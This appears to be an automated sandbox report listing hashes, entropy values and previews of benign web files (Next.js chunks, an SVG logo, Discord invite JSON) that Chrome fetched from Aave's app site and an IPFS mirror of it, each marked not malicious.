                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9645
                                                                                                                                                                                                                                                  Entropy (8bit):5.468661838687384
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Hvk43sJ/0ove4Tvp3JRG8WZX/zg8Fr8qHPzn0zCjXNaLm1Sx2pOsYKZIo:HvB3sNpve4TvpK8Wl/zmc70W7Na5gYsj
                                                                                                                                                                                                                                                  MD5:00EE47482B87F6A12030E826DD8DFAC7
                                                                                                                                                                                                                                                  SHA1:FDD69DFEF21CF23F199EED2CF00AF3D419C06FE4
                                                                                                                                                                                                                                                  SHA-256:AC532CEB2C222BF4EF02F34FD300749F248C55240866312B04DDDD52F30C35A5
                                                                                                                                                                                                                                                  SHA-512:B32CA8A96E4DC80D32C68C86D489946F6257E0F6E41731564BDD314E60F497F8F874D9D575ABD0DBFE90B829E4470722002831215D3D49EFB1C7A39A0495EB24
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1102],{96471:function(e,t,r){var o=r(64836);t.Z=void 0;var n=o(r(64938)),a=r(85893),i=(0,n.default)((0,a.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");t.Z=i},21386:function(e,t,r){var o=r(64836);t.Z=void 0;var n=o(r(64938)),a=r(85893),i=(0,n.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");t.Z=i},81481:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"m20 12-1.41-1.41L13 16.17V4h-2v12.17l-5.58-5.59L4 12l8 8 8-8z"}),"ArrowDownward")},65445:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6 1.41-1.41z"}),"KeyboardArrowDown")},78678:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"M7.4
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25149), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25149
                                                                                                                                                                                                                                                  Entropy (8bit):5.515346335535246
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:1yPm6XaPSuVecXWY/MZ0CawHJv2Vz0RXGbI:X1BezYFCaQr
                                                                                                                                                                                                                                                  MD5:2A5381EA778B8B82FB8CE2B1D87BC39F
                                                                                                                                                                                                                                                  SHA1:7A4582E891161EB0E7D61F799D9812BB0C732729
                                                                                                                                                                                                                                                  SHA-256:B6A7049D52879FD22DBA0377B59901C5D647B57773D4ECB53D97C6F3DEA343EA
                                                                                                                                                                                                                                                  SHA-512:CBEB6007A668BF8FC5ABC0DAE3490EE948A91F291A732B524ACC5D221D8D1218E412D42FA52F0E94AA22B15F1754A09181610ADED2EDEED143B4425F7FE18121
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2992],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},89722:function(e,t,r){r.d(t,{Z:function(){return x}});var n=r(87462),o=r(63366),a=r(67294),i=r(86010),s=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1831
                                                                                                                                                                                                                                                  Entropy (8bit):4.961280765891291
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:wEQL+HXOVdDz2NHTFGx/HeqU0ez8y2WbDLghwwK6DN:/mDy1BKH5U0eIC/LgXR
                                                                                                                                                                                                                                                  MD5:3A513F9FC38F1826D1F8B8513DD83847
                                                                                                                                                                                                                                                  SHA1:DBC025A187CC8C23778DE3CE0DAD0AA2F1CC2B68
                                                                                                                                                                                                                                                  SHA-256:CE2542556C9EB1A4375266128CEF15396087A58B803F2083839BE6FC87C67900
                                                                                                                                                                                                                                                  SHA-512:76D267E553DFAC48DDFD064A40E516E1DC9D641AC77005186DE2348CF3CB52D92A0D0E94E7C9FBC28B585CC04C2462E79C6C43B8CB86B751C2E0646824BA541B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="800" height="800"><defs><linearGradient id="b" x1=".907" y1=".227" x2=".163" y2=".853" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient><clipPath id="a"><path d="M0 0h800v800H0z"/></clipPath><filter id="c" x="251.25" y="182.25" width="298.205" height="434.66" filterUnits="userSpaceOnUse"><feOffset/><feGaussianBlur stdDeviation=".25" result="c"/><feFlood flood-opacity=".161"/><feComposite operator="in" in2="c"/><feComposite in="SourceGraphic"/></filter></defs><g clip-path="url(#a)"><circle cx="388" cy="388" r="388" transform="translate(12 12)" fill="url(#b)"/><g filter="url(#c)"><path d="M531.775 616.161A16.493 16.493 0 0 1 515.3 599.69v-47.959a16.453 16.453 0 1 0-32.907 0v22.76a16.453 16.453 0 0 1-32.907 0v-22.76a16.458 16.458 0 1 0-32.915 0v6.194a16.471 16.471 0 0 1-32.941 0v-6.194a16.458 16.458 0 1 0-32.915 0v22.76a16.453 16.453 0 0 1-32.907 0v-22.76a16.453 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7572), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7572
                                                                                                                                                                                                                                                  Entropy (8bit):5.365534498478483
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Pf30aQNTbM9JTXZw79oM8MTNT9mhTQ0U850U8zdf:PHUTbM9JTupxmTQJ85J8xf
                                                                                                                                                                                                                                                  MD5:4B2838AA145F5808AD6342C3CBABF5E1
                                                                                                                                                                                                                                                  SHA1:33766DE3BBF3EAEDED756F10FF420C464A6D2525
                                                                                                                                                                                                                                                  SHA-256:8F992664E98CE82069160551B944D5C10FFCFB78C6BCCA6CED994DA5B56DF742
                                                                                                                                                                                                                                                  SHA-512:E2A2A0A9EDF9913F2F72795117613518D00BD26894529C92C591594CE2BB298A1559AADAE577C4551440EC96E825ADBE612CBF9E7F52208C67A39DD7CF906954
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/330.182af63f38cc0e3d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),n=r(67294),i=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);function g(e){return(0,f.Z)("MuiToggleButton",e)}var h=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),v=r(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(d.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,c.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,o="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(o="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pal
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                  Entropy (8bit):4.37144473219773
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                                                                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                                                                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                                                                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                                                                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25017), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):25017
                                                                                                                                                                                                                                                  Entropy (8bit):5.490324489362877
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:60xIvm0TehCsSkty1KpMpsmp7KAQP6fBUxca0cnYB66q6ys1Hb/kb/e:9x2maehCsbtyEcsm7ZBfBUx9lnAvbkbe
                                                                                                                                                                                                                                                  MD5:CE587F0255C77D4E85AE8D6C8E4AEFB1
                                                                                                                                                                                                                                                  SHA1:804E5A006C97DD1D04B16FD2B83A160C8B5E75AC
                                                                                                                                                                                                                                                  SHA-256:E60CE58E41446D0055D0D566697B054FD9C3263DFC198C736DBC4B5C8773140F
                                                                                                                                                                                                                                                  SHA-512:F0EA0ED586B990B69781D238B33C7EE048C8F0E3CE9F6A6E6572FC7B30B90AB724BC5B71D69E800320BE541D5F96DE6D4698B77D37E7FC1F57056A37C47204AB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7211.97ed2d8f31bff064.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7211],{1252:function(e,t,r){r.d(t,{O:function(){return s}});var n=r(49501),a=r(85893),s=function(){return(0,a.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing support, it is not possible to perform a collateral switch where stETH is the source token."})}},81902:function(e,t,r){var n;r.d(t,{R:function(){return n}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(n||(n={}))},25049:function(e,t,r){r.d(t,{Y:function(){return d}});var n=r(59499),a=r(4730),s=r(49501),o=r(81902),i=r(58527),l=r(85893),c=["capType"];function u(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function p(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?u(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.ge
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7220), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7220
                                                                                                                                                                                                                                                  Entropy (8bit):5.361627992381026
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Zf30aQNTbM9JT3Zw79oM8MTNT2ma/HM0U8VxSN1s:ZHUTbM9JTOpxC/sJ8Vxs1s
                                                                                                                                                                                                                                                  MD5:5FEE7C9239EEF37B3DBDBEADD751D266
                                                                                                                                                                                                                                                  SHA1:8C51FFCE34FA17F1D498071D8C0CB8C046F5C5C0
                                                                                                                                                                                                                                                  SHA-256:5C416D84CBE45508A8C837E1BB79150F122FCF5211A090D3EC7564D842B4D895
                                                                                                                                                                                                                                                  SHA-512:F393FB9E576DDD650B9F4E4BADAD100987081F81CB31C5248BECFCF0EAF4701F32029172ED050DC01104D7B28CE623689E086270D0185F87DFA01E6749C51C7C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/3652.76d2fc48524771f4.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3652],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),i=r(67294),n=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);function g(e){return(0,f.Z)("MuiToggleButton",e)}var h=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),v=r(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(d.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,c.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,o="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(o="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):155120
                                                                                                                                                                                                                                                  Entropy (8bit):5.605855860453334
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:oJlKDHkaoiDJKO/ufj1TSPvXUxeaUl52I7MeLKt5adoOZW/u8WJzccZVrrw7xzIJ:xkNhBivFaS52IxalbcZxc7hucw
                                                                                                                                                                                                                                                  MD5:E869561F71A338B32BEDDCFEAE40135B
                                                                                                                                                                                                                                                  SHA1:48319D60549B0A880DE73043BF9E445B55D948D0
                                                                                                                                                                                                                                                  SHA-256:373050D4DA17E4E9116A1E8BE88674B308AC420784BF4017BCB2BF71AD510638
                                                                                                                                                                                                                                                  SHA-512:03A632CEF5AA88D1723CE9024B9E0780E7F048363EE0ABF80639EF6853C68718BDCC3DDC7CCADCA4B060351A97A1B49A3F2F18A48E340451CD24CF68C1366BDD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["86684"],{863942:function(e,t,n){var s=n(22092);(0,n(192291).exportTypedArrayStaticMethod)("from",n(12367),s)},70519:function(e){e.exports="/assets/76a4af59aa173c519461.svg"},806848:function(e){e.exports="/assets/6183fdc13d8046fd5bda.svg"},512266:function(e){e.exports="/assets/a2d51a24d014f52f83a6.png"},105020:function(e){e.exports="/assets/89ea0e62d0f8ffa67a17.svg"},211095:function(e){e.exports="/assets/86755fd1deda5cb45518.svg"},640356:function(e){e.exports="/assets/3880dc73d6be9d91ef36.svg"},515695:function(e){e.exports="/assets/450a761db3bfe89ca9b9.png"},892235:function(e){e.exports="/assets/48f03d965f1e82275006.svg"},375673:function(e){e.exports="/assets/3cf7f333e815240d3294.svg"},73962:function(e){e.exports="/assets/ed7318a94c14ce41d11d.svg"},689411:function(e){e.exports="/assets/831c999494cb5e095eae.svg"},2984:function(e){e.exports="/assets/0e5029fd9cd4812b6712.svg"},575703:function(e){e.exports=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14048), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):14048
                                                                                                                                                                                                                                                  Entropy (8bit):5.544747292523965
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:KyPmhhzGy99RQdVeiHXerPdLUvmuoo1bF1pH59jvN/zCQ:KyPSzG2uVecXWqowtHfvVzCQ
                                                                                                                                                                                                                                                  MD5:0E9FAB8B656DFDF601D82A2762A4C22F
                                                                                                                                                                                                                                                  SHA1:AB850DE7A831A2F9451A49A1779B59C17E807CAC
                                                                                                                                                                                                                                                  SHA-256:860C5B05BCE38AE059DB59CB69E3AAAB653483B582CDD369FCA7E3E21F7A9B50
                                                                                                                                                                                                                                                  SHA-512:C49B704D30783F51F3340E12A6B5BD8E8D21A3D056F9F42D9EC821189E70936A4846A3BF3E010D5E30DC2194323A2D219432006BFBB903A23B595364137D5895
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/652.53344261806e4edf.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[652],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},9144:function(e,t,r){var n=r(63366),o=r(87462),s=r(67294),i=r(95408),c=r(98700),a=r(39707),l=r(59766),u=r(81719),d=r(78884),p=r(85893);const x=["component","direction","spacing","divider","children"];function f(e,t){const r=s.Children.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(s.cloneElement(t,{key:`separator-${o}`})),e)),[])}const m=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",o
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                                                                  Entropy (8bit):5.492365466240539
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Y7ro6fkugm9fZN3wD8R64I8akV76CAlciTk0rj8o:Y7U0kugm9fH37RXV769lcnYjD
                                                                                                                                                                                                                                                  MD5:DC03348AC423117ACD02BFBAB1212743
                                                                                                                                                                                                                                                  SHA1:043AE920A93F2BD221AA4C60A8F68F7B76A7496F
                                                                                                                                                                                                                                                  SHA-256:E68C6AFF2D61A25F9E021F3529F26022EEDF13844669B927797C5E929A874225
                                                                                                                                                                                                                                                  SHA-512:4AA0EEF5AE3391E985B2B9C843AF90ED2CB361EA94FA77998DE69323C853D08EBD69B4BDE2B11570AE20D723B8907EF7303F526144D92405B2685861F530E801
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/api/v9/invites/aave?with_counts=true&with_expiration=true
                                                                                                                                                                                                                                                  Preview:{"type":0,"code":"aave","expires_at":null,"flags":2,"guild":{"id":"602826299974877205","name":"Aave Community","splash":"26d834daa945e775d8af2935a04f83e7","banner":"0cb872905cbb21b9459917b0f4ad59d5","description":"The Aave Protocol is an open source, decentralized, non-custodial liquidity protocol.","icon":"85edbf0edebc2025a16a76b89b1cb937","features":["DISCOVERABLE","VANITY_URL","CHANNEL_ICON_EMOJIS_GENERATED","ANIMATED_ICON","ANIMATED_BANNER","INVITE_SPLASH","SEVEN_DAY_THREAD_ARCHIVE","WELCOME_SCREEN_ENABLED","PREVIEW_ENABLED","BANNER","MEMBER_PROFILES","NEWS","ROLE_ICONS","AUTO_MODERATION","THREE_DAY_THREAD_ARCHIVE","MEMBER_VERIFICATION_GATE_ENABLED","ENABLED_DISCOVERABLE_BEFORE","GUILD_HOME_TEST","THREADS_ENABLED","COMMUNITY","NEW_THREAD_PERMISSIONS","GUILD_WEB_PAGE_VANITY_URL","PRIVATE_THREADS"],"verification_level":4,"vanity_url_code":"aave","nsfw_level":0,"nsfw":false,"premium_subscription_count":16},"guild_id":"602826299974877205","channel":{"id":"1065814556636610622","type":0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8048), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8048
                                                                                                                                                                                                                                                  Entropy (8bit):5.347704777959417
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FAwjeDDa0quSyj+fFPSDNU69gNHXUpZPWLM8EB8B2HqWenY:FiDO0qNt5UNU69gNHXo/O1rY
                                                                                                                                                                                                                                                  MD5:E1D081540AD13E71ECB22AE80793C0CA
                                                                                                                                                                                                                                                  SHA1:24638E61335E3FDE596BA1B4C0A40FB6B774DAAC
                                                                                                                                                                                                                                                  SHA-256:DCE7FD867A38FA67E6769469CBDB9B335E7C6FE6B40FA83E87397559C338268D
                                                                                                                                                                                                                                                  SHA-512:A5F3AE403582FF2FA9692AE3F65F633DD0EF45F1177F0BD190A09C426FD6F9AA304A370CB4CE4EDAE57F5A4B7AB427A035F2C6C6F53556F9C73052173A7C9EF9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1506],{64288:function(e,t,o){o.d(t,{Z:function(){return y}});var r=o(63366),a=o(87462),i=o(67294),n=o(86010),s=o(28320),d=o(34867),l=o(94780),c=o(29628),u=o(13264),p=o(66500),m=o(85893);const h=["className","component","disableGutters","fixed","maxWidth","classes"],f=(0,p.Z)(),g=(0,u.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:o}=e;return[t.root,t[`maxWidth${(0,s.Z)(String(o.maxWidth))}`],o.fixed&&t.fixed,o.disableGutters&&t.disableGutters]}}),b=e=>(0,c.Z)({props:e,name:"MuiContainer",defaultTheme:f});var v=o(36622),x=o(81719),Z=o(78884);const R=function(e={}){const{createStyledComponent:t=g,useThemeProps:o=b,componentName:c="MuiContainer"}=e,u=t((({theme:e,ownerState:t})=>(0,a.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (26243), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):26243
                                                                                                                                                                                                                                                  Entropy (8bit):5.330872444614347
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:XyP7vQ9gP3+1pt7+vQVGhLZPGKVzuJifGbI:AsqmpVGhL06
                                                                                                                                                                                                                                                  MD5:631CD392630B6081E65CEF0E6F9CA34F
                                                                                                                                                                                                                                                  SHA1:E11400D2F2DEEEB0B0F0C059B20DAE324AE62500
                                                                                                                                                                                                                                                  SHA-256:2D8895EABBE05A9FADB895A9C9DB354A3AA820044D08059C728C0406488B526A
                                                                                                                                                                                                                                                  SHA-512:AB8DB274E93496E246DC49479A7D8FBF82BBB70302132D5752316DF0E5CB8C33C5D8607C1A6BD04A4779EB38320A07E3FC8BE4A955CD24A8D33494F255AFA95F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6745.f8196274743a395d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6745],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),c=r(94780),s=r(81719),u=r(78884),l=r(36622),p=r(34867);function f(e){return(0,p.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50092), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):50092
                                                                                                                                                                                                                                                  Entropy (8bit):5.443755687994656
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:taequ+Crnl/mVsBcWGtamSQhtDH8tCBxLScWpM0x7+bAtkTsRe:Qequ+Cr1mVsBcWGtamSQhtDH8tCBlScr
                                                                                                                                                                                                                                                  MD5:F9A332F0C91326C90FF9C9E82AF7EBCF
                                                                                                                                                                                                                                                  SHA1:E56FDD50703B9DAC6EB88EF066E527B2171B01F4
                                                                                                                                                                                                                                                  SHA-256:31CB0A1DAEEA9AA0F498562C2207BA9BD60235DF4DD161C8E1F8CC23F1C4D5FE
                                                                                                                                                                                                                                                  SHA-512:BA3C4EE64C2EC69C60E17E5F2B8A828E4273303B9483185FD49434279241890BE04342DC1F09B30CEC40108A48A10EA23A9E8B47908C95086A0305153127DC89
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
